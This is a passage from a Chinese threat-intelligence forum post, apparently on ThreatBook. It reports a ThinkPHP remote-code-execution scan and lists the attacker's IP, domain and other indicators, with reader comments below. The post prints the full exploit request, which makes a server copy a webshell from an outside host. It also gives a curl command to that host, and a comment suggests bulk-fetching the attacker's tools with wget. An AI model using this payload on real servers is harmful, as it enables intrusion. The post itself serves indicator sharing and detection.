扫描 系统漏洞利用
Thinkphp漏洞扫描 c2域名中有攻击工具
匿名用户 2018-12-29 10:32:13 2389人浏览

112.82.243.92 "GET /index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://t.server-3v.com/Webshell%5C/php%5C/info.txt&vars[1][]=./info.txt HTTP

112.82.243.92 来自江苏常州

域名http://t.server-3v.com/

curl http://t.server-3v.com/Webshell/php/info.txt

My Name  is Shadow

My Dick So Big and You can try .

有人收集这些工具吗?

2018-12-29 10:25:30屏幕截图.png

威胁指标(IOC)
ip地址(1) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
域名(1) 威胁情报数目 子域名 历史指向ip 相关样本 微步标签 < 1/1 >
Hash(1) 检测结果 关联样本 微步标签 免费 全部 < 1/1 >
评论 10
风语者 2019-01-24 08:00:56 回复
是不是这个意思:我是暗影,我这里无所不包,你尽可以拿去试试。

我用某尾巴带零流氓的某型10安全浏览器打开了一下这个网站,倒是很安静,下载么,就算了,我怕招来一堆不请自来的。

诸位高级网络安全工程师给分析分析,这是不是一个供计算机安全工程学研究和使用的软件仓库呢?
匿名用户 2019-01-24 16:39:07 回复
回复@风语者: 拿到机器后,用这个域名把工具拉过去渗透内网的?
风语者 2019-02-14 22:26:50 回复
今天再去看看這個倉庫,好像多了些庫存,最近入庫是今年1月14號的BUGFIX,這是啥東西?
匿名用户 2019-02-19 13:40:44 回复
回复@风语者: 下线了
天才小熊猫 2019-01-22 22:00:14 回复
很赞
匿名用户 2019-01-14 09:18:34 回复
“My Dick So Big and You can try 。。。。”有大佬翻译一下么
3417886755 2019-01-03 17:19:15 回复
支持
匿名用户 2018-12-31 16:07:23 回复
怎么批量下载
匿名用户 2018-12-31 17:58:36 回复
用脚本遍历目录wget
匿名用户 2018-12-29 14:16:14 回复
很赞
今日推荐